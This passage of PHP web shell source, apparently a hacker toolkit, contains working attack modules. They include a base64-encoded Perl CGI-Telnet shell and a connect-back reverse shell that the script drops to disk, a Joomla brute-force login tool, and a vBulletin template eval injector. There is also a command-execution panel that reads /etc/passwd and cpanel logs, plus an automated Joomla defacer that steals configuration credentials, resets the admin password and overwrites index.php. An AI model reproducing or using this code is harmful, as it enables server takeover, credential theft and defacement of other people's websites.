QYXJzZTsKJkdldENvb2tpZXM7CgokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9OwokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307CiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307CiRSdW5Db21tYW5kID0gJGlueydjJ307CiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsKJE9wdGlvbnMgPSAkaW57J28nfTsKCiRBY3Rpb24gPSAkaW57J2EnfTsKJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAkaW57J2QnfTsKY2hvcCgkQ3VycmVudERpciA9IGAkQ21kUHdkYCkgaWYoJEN1cnJlbnREaXIgZXEgIiIpOwoKJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOwoKaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4KewoJJlBlcmZvcm1Mb2dpbjsKfQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQKewoJJkV4ZWN1dGVDb21tYW5kOwp9CmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlCnsKCSZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CgkmRG93bmxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0K\';\r\n\r\n$file = fopen("izo.cin" ,"w+");\r\n$write = fwrite ($file ,base64_decode($cgishellizocin));\r\nfclose($file);\r\n    chmod("izo.cin",0755);\r\n$netcatshell = \'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh\r\nMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog\r\nICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo\r\nMSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg\r\nICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb\r\nMV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb\r\nKl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An\r\nKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf\r\nSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg\r\nICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF\r\nUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi\r\nVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu\r\nZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+\r\nJlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl\r\nbihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu\r\nICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE\r\nYXRhY2hlZFxuXG4iOw==\';\r\n\r\n$file = fopen("dc.pl" ,"w+");\r\n$write = fwrite ($file ,base64_decode($netcatshell));\r\nfclose($file);\r\n    chmod("dc.pl",0755);\r\n   echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe> \r\n\r\n \r\n </div>"; }\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jbrute\')) \r\n{ \r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jbrute" method="post">\r\n\r\n\t<meta name="author" content="RetnOHacK" />\r\n    <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />\r\n    <meta name="description" content="RetnOHacK #Procoder\'z Team Albanian" />\r\n<center>\r\n</br></br>\r\n<center><b><font color="lime">+--=[ Joomla Bruter Force ]=--+</font></b><br /><br />\r\n<form method="post" action="" enctype="multipart/form-data"> \r\n<table class="tabnet" width="38%" border="0"><center>\r\n<th colspan="2">Joomla Brute Force</th>\r\n<tr><td><p ><font  class="d1">User :</font></th>\r\n<input class="inputz" type=\'text\' name="usr" value="admin" size="15"> </font></center><br /><br /></p>\r\n</td></tr>\r\n<tr><td><font class="">Sites list :</font> \r\n</td><td><font class="" >Pass list :</font></td></tr>\r\n<tr>\r\n\t\t<td>\r\n<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>\r\n</td><td>\r\n<textarea name="w0rds" style="background:black;" cols="40" rows="13" >\r\nadmin\r\n123456\r\npassword\r\n102030\r\n123123\r\n12345\r\n123456789\r\npass\r\ntest\r\nadmin123\r\ndemo\r\n!@#$%^\r\n</textarea>\r\n</td></tr><center><tr><td>\r\n<font > \r\n<input class="inputzbut" type="submit" name="x" value="start" id="d4"> \r\n</font></td></tr><br>\r\ntanks for procoder\'z team albanian<br></center></table>\r\n</form></center>\r\n<? \r\n@set_time_limit(0); \r\n\r\nif($_POST[\'x\']){ \r\n\r\necho "<hr>"; \r\n\r\n$sites = explode("\\n",$_POST["sites"]); // Get Sites \r\n$w0rds = explode("\\n",$_POST["w0rds"]); // Get w0rdLiSt \r\n\r\n$Attack = new Joomla_brute_Force(); // Active Class \r\n\r\n\r\nforeach($w0rds as $pwd){ \r\n\r\nforeach($sites as $site){ \r\n\r\n\r\n$Attack->check_it(txt_cln($site),$_POST[\'usr\'],txt_cln($pwd)); // Brute :D \r\nflush();flush(); \r\n\r\n} \r\n\r\n} \r\n\r\n} \r\n\r\n\r\n# Class & Function\'z \r\n\r\nfunction txt_cln($value){  return str_replace(array("\\n","\\r"),"",$value); } \r\n\r\nclass Joomla_brute_Force{ \r\n\r\npublic function check_it($site,$user,$pass){ // print result \r\n\r\nif(eregi(\'com_config\',$this->post($site,$user,$pass))){ \r\n\r\necho "<span class=\\"x2\\"><b># Success : $user:$pass -> <a href=\'$site/administrator/index.php\'>$site/administrator/index.php</a></b></span><BR>";\r\n$f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\\n"); fclose($f); \r\nflush(); \r\n}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} \r\n\r\n} \r\n\r\npublic function post($site,$user,$pass){ // Post -> user & pass \r\n\r\n$token = $this->extract_token($site); \r\n\r\n$curl=curl_init(); \r\n\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1); \r\ncurl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); \r\n@curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); \r\n@curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); \r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); \r\n@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); \r\ncurl_setopt($curl,CURLOPT_POST,1); \r\ncurl_setopt($curl,CURLOPT_POSTFIELDS,\'username=\'.$user.\'&passwd=\'.$pass.\'&lang=en-GB&option=com_login&task=login&\'.$token.\'=1\'); \r\ncurl_setopt($curl,CURLOPT_TIMEOUT,20); \r\n\r\n$exec=curl_exec($curl); \r\ncurl_close($curl); \r\nreturn $exec; \r\n\r\n} \r\n\r\npublic function extract_token($site){ // get token from source for -> function post \r\n\r\n$source = $this->get_source($site); \r\n\r\npreg_match_all("/type=\\"hidden\\" name=\\"([0-9a-f]{32})\\" value=\\"1\\"/si" ,$source,$token); \r\n\r\nreturn $token[1][0]; \r\n\r\n} \r\n\r\npublic function get_source($site){ // get source for -> function extract_token \r\n\r\n$curl=curl_init(); \r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1); \r\ncurl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); \r\n@curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); \r\n@curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); \r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); \r\n@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); \r\ncurl_setopt($curl,CURLOPT_TIMEOUT,20); \r\n\r\n$exec=curl_exec($curl); \r\ncurl_close($curl); \r\nreturn $exec; \r\n\r\n} \r\n\r\n} \r\n}\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'vb\'))\r\n   {\r\n   ?>\r\n   <form action="?y=<?php echo $pwd; ?>&x=vb" method="post">\r\n   <br><br><br><div align="center">\r\n   <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">\r\n   <b><font color="#00FF00">+--=[ VB Index Changer ]=--+</font></b>\r\n   </div><br>\r\n   <?\r\n   if(empty($_POST[\'index\'])){\r\n   echo "<center><FORM method=\\"POST\\">";\r\n   echo "<table class=\\"tabnet\\">\r\n<th colspan=\\"2\\">Vb Index Changer</th>\r\n<tr><td>host </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"localhost\\" value=\\"localhost\\"></td></tr>\r\n<tr><td>database </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"database\\" value=\\"forum_vb\\"></td></tr>\r\n<tr><td>username </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"username\\" value=\\"user_vb\\"></td></tr>\r\n<tr><td>password </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"password\\" value=\\"vb\\"></td></tr>\r\n</tr>\r\n<th colspan=\\"2\\">Your Index Code</th></table><table class=\\"tabnet\\">\r\n<TEXTAREA name=\\"index\\" rows=\\"13\\" style=\\"background:black\\" border=\\"1\\" cols=\\"69\\" name=\\"code\\">your index code</TEXTAREA><br>\r\n<INPUT class=\\"inputzbut\\" type=\\"submit\\" value=\\"setting\\" name=\\"send\\">\r\n</FORM></table></center>";\r\n    }else{\r\n    $localhost = $_POST[\'localhost\'];\r\n    $database = $_POST[\'database\'];\r\n    $username = $_POST[\'username\'];\r\n    $password = $_POST[\'password\'];\r\n    $index = $_POST[\'index\'];\r\n    @mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n    @mysql_select_db($database) or die(mysql_error());\r\n    $index=str_replace("\\\'","\'",$index);\r\n    $set_index = "{\\${eval(base64_decode(\\\'";\r\n    $set_index .= base64_encode("echo \\"$index\\";");\r\n    $set_index .= "\\\'))}}{\\${exit()}}</textarea>";\r\n    echo("UPDATE template SET template =\'".$set_index."\' ") ;\r\n    $ok=@mysql_query("UPDATE template SET template =\'".$set_index."\'") or die(mysql_error());\r\n    if($ok){\r\n    echo "!! update finish !!<br><br>";\r\n    } \r\n  }\r\n}\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypass\')) \r\n{ \r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=bypass" method="post">\r\n\r\n<?php\r\necho "<center/><br/><b><font color=#00ff00>-=[ Command  Bypass Exploit ]=-</font></b><br>\r\n";\r\nprint_r(\'\r\n<pre>\r\n<form method="POST" action="">\r\n<b><font color=#00ff00><b><font color="#00ff00">Command  :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">\r\n</form>\r\n<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass  :=)  </font></strong><select name="liz0" size="1" class="inputz">\r\n<option value="cat /etc/passwd">/etc/passwd</option>\r\n<option value="netstat -an | grep -i listen">netstat</option>\r\n<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>\r\n<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>\r\n<option value="cat /etc/hosts">/etc/hosts</option>\r\n<option value="cat /etc/named.conf">/etc/named.conf</option>\r\n<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>\r\n</select> <input type="submit" class="inputzbut" value="G&ouml;">\r\n</form>\r\n</pre>\r\n\');\r\nini_restore("safe_mode");\r\nini_restore("open_basedir");\r\n$liz0=shell_exec($_POST[baba]); \r\n$liz0zim=shell_exec($_POST[liz0]); \r\n$uid=shell_exec(\'id\');\r\n$server=shell_exec(\'uname -a\');\r\necho "<pre><h4>";\r\n\r\necho $liz0;\r\necho $liz0zim;\r\necho "</h4></pre>";\r\n "</div>"; }\r\n\r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\n elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jodexer\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jodexer" method="post">\r\n\r\n<?php\r\n\r\nfunction randomt() {\r\n    \r\n        $chars = "abcdefghijkmnopqrstuvwxyz023456789";\r\n        srand((double)microtime()*1000000);\r\n        $i = 0;\r\n        $pass = \'\' ;\r\n    \r\n        while ($i <= 7) {\r\n            $num = rand() % 33;\r\n            $tmp = substr($chars, $num, 1);\r\n            $pass = $pass . $tmp;\r\n            $i++;\r\n        }\r\n    \r\n        return $pass;\r\n    \r\n    }\r\n    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)\r\n    {\r\n    $ar0=explode($marqueurDebutLien, $text);\r\n    $ar1=explode($marqueurFinLien, $ar0[$i]);\r\n    $ar=trim($ar1[0]);\r\n    return $ar;\r\n    }\r\n    if ($_POST[\'form_action\'])\r\n    {\r\n    \r\n    $text=file_get_contents($_POST[\'file\']);\r\n    $username=entre2v2($text,"public $user = \'","\';");\r\n    $password=entre2v2($text,"public $password = \', \'","\';");\r\n    $dbname=entre2v2($text,"public $db = \', \'","\';");\r\n    $dbprefix=entre2v2($text,"public $dbprefix = \'","\';");\r\n    $site_url=($_POST[\'site_url\']);\r\n    \r\n    $h="<? echo(stripslashes(base64_decode(\'".urlencode(base64_encode(str_replace("\'","\'",($_POST[\'code\']))))."\'))); exit; ?>";\r\n    \r\n    $co=randomt();  \r\n      /*\r\n    echo($username);\r\n    echo("<br>");\r\n    echo($password);\r\n    echo("<br>");\r\n    echo($dbname);\r\n    echo("<br>");\r\n    echo($dbprefix);\r\n    echo("<br>");\r\n    */\r\n    $co=randomt();\r\n    \r\n    if ($_POST[\'form_action\'])\r\n    {\r\n    $h="<? echo(stripslashes(base64_decode(\'".urlencode(base64_encode(str_replace("\'","\'",($_POST[\'code\']))))."\'))); exit; ?>";\r\n    \r\n    \r\n    \r\n    \r\n    \r\n          $link=mysql_connect("dzoed.druknet.bt",$username,$password) ;\r\n    \r\n             mysql_select_db($dbname,$link) ;\r\n    \r\n    $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username =\'admin\' , password = \'2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX\'");\r\n    echo("<br>[+] Changing admin password to 123456789");  \r\n                    \r\n                     $req =mysql_query("SELECT * from  `".$dbprefix."extensions` ");\r\n                    \r\n    if ( $req )\r\n    {\r\n    #################################################################\r\n    ######################        V1.6         ######################\r\n    #################################################################\r\n    \r\n                  \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."template_styles` WHERE client_id=\'0\' and home=\'1\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_name=$data["template"];\r\n    \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."extensions` WHERE name=\'".$template_name."\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_id=$data["extension_id"];\r\n    \r\n    $url2=$site_url."/index.php";\r\n    \r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 1);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    \r\n    \r\n    $buffer = curl_exec($ch);\r\n    \r\n    $return=entre2v2($buffer ,\'<input type="hidden" name="return" value="\',\'"\');\r\n    $hidden=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',4);\r\n    \r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,"com_config");\r\n    if($pos === false) {\r\n    echo("<br>[-] Login Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] Login Successful");\r\n    }\r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden2=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',2);\r\n    if($hidden2) {\r\n    echo("<br>[+] index.php file founded in Theme Editor");\r\n    }\r\n    else {\r\n    echo("<br>[-] index.php Not found in Theme Editor");\r\n    exit;\r\n    }\r\n    echo("<br>[*] Updating Index.php .....");\r\n    $url2=$site_url."/index.php?option=com_templates&layout=edit";\r\n    \r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");\r\n    \r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,\'<dd class="message message">\');\r\n    if($pos === false) {\r\n    echo("<br>[-] Updating Index.php Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] index.php successfully saved");\r\n    }\r\n    #################################################################\r\n    ######################      V1.6  END      ######################\r\n    #################################################################\r\n    \r\n    \r\n    }\r\n    else\r\n    {\r\n    \r\n    #################################################################\r\n    ######################      V1.5           ######################\r\n    #################################################################\r\n                    \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."templates_menu` WHERE client_id=\'0\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_name=$data["template"];\r\n    \r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 1);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',3);\r\n    \r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,"com_config");\r\n    \r\n    if($pos === false) {\r\n    echo("<br>[-] Login Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[+] Login Successful");\r\n    }\r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden2=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',6);\r\n    \r\n    if($hidden2) {\r\n    echo("<br>[~] index.php file founded in Theme Editor");\r\n    }\r\n    else {\r\n    echo("<br>[-] index.php Not found in Theme Editor");\r\n    }\r\n    \r\n    echo("<br>[*] Updating Index.php .....");\r\n    $url2=$site_url."/index.php?option=com_templates&layout=edit";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,\'<dd class="message message fade">\');\r\n    if($pos === false) {\r\n    echo("<br>[-] Updating Index.php Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] index.php successfully saved");\r\n    }\r\n    #################################################################\r\n    ######################      V1.5  END      ######################\r\n    #################################################################\r\n    \r\n    }\r\n    \r\n    }\r\n    \r\n    \r\n    function randomt() {\r\n    \r\n        $chars = "abcdefghijkmnopqrstuvwxyz023456789";\r\n        srand((double)microtime()*1000000);\r\n        $i = 0;\r\n        $pass = \'\' ;\r\n    \r\n        while ($i <= 7) {\r\n            $num = rand() % 33;\r\n            $tmp = substr($chars, $num, 1);\r\n            $pass = $pass . $tmp;\r\n            $i++;\r\n        }\r\n    \r\n        return $pass;\r\n    \r\n    }\r\n    \r\n    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)\r\n    \r\n    {\r\n    \r\n    $ar0=explode($marqueurDebutLien, $text);\r\n    $ar1=explode($marqueurFinLien, $ar0[$i]);\r\n    $ar=trim($ar1[0]);\r\n    return $ar;\r\n    }\r\n    \r\n    }?>\r\n    <center><br><br>\r\n    <font color="#00ff00" size=\'+3\'><b>+--=[ Automatic Joomla Index Changer ]=--+</b></font><br><br>\r\n    </center>\r\n    <center><b>\r\n    Link of symlink configuration.php of Joomla<br></b>\r\n    <FORM action=""  method="post">\r\n    <input type="hidden" name="form_action" value="1">\r\n     <input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php">\r\n    <br>\r\n    <br><b>\r\n    Admin Control panel url</b><br>\r\n    <input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br>\r\n    <br><b>\r\n    Your Index Code</b>\r\n    <br>\r\n    <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code\r\n            </TEXTAREA>\r\n            <br>\r\n    <INPUT  class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">\r\n    </FORM>\r\n     </center>\r\n    <script language=JavaScript>m=\'%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E\';d=unescape(m);document.write(d);</script>\r\n\t<?php\r\n}\r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\n elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cgi2012\')) { \r\n echo "<center/><br/><b>\r\n +--==[ CGI-Telnet Version 1.3 ]==--+ \r\n </b><br><br>";\r\n \r\n \r\n    mkdir(\'cgi2012\', 0755);\r\n    chdir(\'cgi2012\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "AddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$cgi2012 = \'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnVzZSBNSU1FOjpCYXNlNjQ7CiRWZXJzaW9uPSAiQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMyI7CiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7CgokUGFzc3dvcmQgPSAiYmFuZHVuZ2tvdGFzYW1wYWgiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4Kc3ViIElzX1dpbigpewoJJG9zID0gJnRyaW0oJEVOVnsiU0VSVkVSX1NPRlRXQVJFIn0pOwoJaWYoJG9zID1+IG0vd2luL2kpewoJCXJldHVybiAxOwoJfQoJZWxzZXsKCQlyZXR1cm4gMDsKCX0KfQokV2luTlQgPSAmSXNfV2luKCk7CQkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYKCQkJCQkJCQkjIHlvdSdyZSBydW5uaW5nIHRoaXMgc2NyaXB0IG9uIGEgV2luZG93cyBOVAoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5p